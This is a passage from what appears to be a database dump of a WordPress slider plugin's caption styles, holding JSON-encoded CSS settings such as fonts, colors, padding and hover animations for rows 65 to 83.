"1\",\"font-size\":\"20px\",\"line-height\":\"40px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(65,'.tp-caption.Sports-Display','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"13px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(66,'.tp-caption.Sports-DisplayFat','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":[\"\"],\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(67,'.tp-caption.Sports-Subline','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"4px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"32px\",\"line-height\":\"32px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(68,'.tp-caption.Instagram-Caption','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(69,'.tp-caption.News-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"60px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(70,'.tp-caption.News-Subtitle','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0px\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"300\",\"easing\":\"power3.inOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"24px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(71,'.tp-caption.Photography-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(72,'.tp-caption.Photography-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#777777\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(73,'.tp-caption.Photography-ImageHover','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"1000\",\"easing\":\"power3.inOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(74,'.tp-caption.Photography-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#00ffde\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(75,'.tp-caption.Photography-Textblock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(76,'.tp-caption.Photography-Subline-2','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(77,'.tp-caption.Photography-ImageHover2','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"back.out\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Arial\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(78,'.tp-caption.WebProduct-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(79,'.tp-caption.WebProduct-SubTitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(80,'.tp-caption.WebProduct-Content','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(81,'.tp-caption.WebProduct-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(82,'.tp-caption.WebProduct-Title-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(83,'.tp-caption.WebProduct-SubTitle-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\